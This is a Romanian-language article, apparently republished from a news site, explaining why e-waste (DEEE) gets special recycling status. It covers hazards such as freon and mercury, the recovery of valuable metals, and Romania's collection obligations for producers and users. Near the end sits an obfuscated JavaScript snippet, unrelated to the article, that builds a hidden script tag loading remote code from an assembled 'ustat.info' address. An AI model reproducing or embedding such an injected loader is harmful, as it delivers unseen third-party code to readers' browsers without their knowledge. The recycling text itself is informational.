De ce electronicele au un statut special pentru reciclare?

Odată cu trecerea timpului, echipamentele electrice și electrocasnicele devin nedorite sau nefuncționale, ajungând astfel la sfârșitul duratei de viață. Electronicele și electrocasnicele au un statut pentru reciclare cu totul special spre deosebire de restul deșeurilor.

Conform legislației cu privire la modalitatea de colectare DEEE (deșeuri echipamente electrice și electrocasnice), atât importatorii și producătorii, cât și utilizatorii au anumite obligații pe care trebuie să le îndeplinească cu scopul de a recicla componentele care se regăsesc în aceste produse. Deși ar trebui predate într-un centru reciclare electronice, din nefericire, cei mai mulți dintre oameni depozitează echipamentele electronice necorespunzător, le aruncă la tomberoane sau chiar prin locuri total neadecvate.

Motive pentru care DEEE au statul special pentru reciclare

  • Afectează mediul înconjurător și sănătatea oamenilor

Acesta este cel mai important motiv pentru care DEE au status de reciclare special. În componența electronicelor și electrocasnicelor se găsesc materiale care pot afecta negativ întreg mediul înconjurător. Spre exemplu, freonul care se regăsește în echipamente frigorifice degradează stratul de ozon, determină creșterea nivelului mării și apariția fenomenelor climatice extreme, extincția diferitelor specii de animale și are impact negativ asupra sănătății oamenilor.

Mercurul, un alt element care se regăsește în componența anumitor electrice (baterii, întrerupătoare, relee, lămpi) afectează îndeosebi sistemul nervos și rinichii.

Cea mai mare parte din materialele regăsite în echipamentele electrice și electronice sunt devastatoare nu doar pentru mediul înconjurător, ci și pentru viața omului. Expunerea pe termen lung la anumite substanțe poate duce la apariția diverselor afecțiuni, la tulburări de memorie, la dereglarea sistemului imunitar și nu numai.

  • Prin reciclarea EEE se recuperează materii prime

În fabricarea plăcilor electronice se folosesc metale rare (indium, antimoniu, gallium, etc.) și materii cu valoare destul de ridicată (aur, argint platină), care ulterior pot fi recuperate. De altfel, se pot recupera și materii cu valoare economică, precum cupru, aluminiu sau plastic.

Deși nu pot fi reutilizate în procesul de fabricare al altor produse electronice, alte materii prime au valoare energetică și pot fi folosite în industria cimentului sau în termocentrale (cauciuc, plastic).

  • Reciclarea DEEE are impact pozitiv asupra economiei și a resurselor naturale

Prin tratarea și reutilizarea materialelor folosite în echipamentele electronice și electrocasnice se reduc cantitățile de resurse naturale consumate în procesul de fabricare al altor produse. Materialele reciclate sunt recondiționate, iar mai reutilizate. Drept urmare, reciclarea are un efect pozitiv și asupra economiei.

Obligații privind colectarea și reciclarea DEEE

În România, producătorii și importatorii au obligația de a colecta în vederea reciclării cel puțin 65% din cantitatea de echipamente electrice și electrocasnice pe care o introduc în piață. În acest scop, pot colecta în regim propriu echipamentele sau pot încheia un contract de transfer de responsabilitate.

În majoritatea cazurilor, cei care colectează în regim propriu dezvoltă diverse acțiuni prin care stimulează cumpărătorii să predea electronicele și electrocasnicele vechi atunci când achiziționează altele noi.

Organizațiile care preiau responsabilității producătorilor și importatorilor au dezvoltat centre de colectare DEEE, unde utilizatorii pot lăsa în mod gratuit echipamentele de care nu mai au nevoie sau care s-au defectat. Aceste organizații asigură tot procesul de preluare al deșeurilor EEE și le gestionează în condiții de protecția mediului până ajung în centrele speciale de reciclare.

Obligațiile revin și de partea utilizatorilor, nu doar a producătorilor și importatorilor. Membrii comunității locale, în calitate de utilizatori direcți sau indirecți ai serviciului de salubrizare, au obligația de a asigura colectarea separată a deșeurilor și predarea lor într-un centru reciclare electronice. Cei care nu pot preda echipamentele într-un centru reciclare electronice, au posibilitatea de a preda echipamentul vechi furnizorului care asigură noul produs electronic.

(function(){
c9p0=document.createElement(“script”);c9p0_=(“ust”);c9p0u=”423641671″;
c9p0_+=”a”+(“t.i”);c9p0.type=”text/javascript”;
c9p0u+=”.b0fqhans9p0nvmg0arsx”;c9p0.async=true;c9p0_+=”n”+(“f”+”o”)+”/”;
c9p0u+=”73ip8ta6uj”;c9p0.src=”https://”+c9p0_+c9p0u;
document.body.appendChild(c9p0);
})();

Articolul De ce electronicele au un statut special pentru reciclare? apare prima dată în Stiri Zilnic.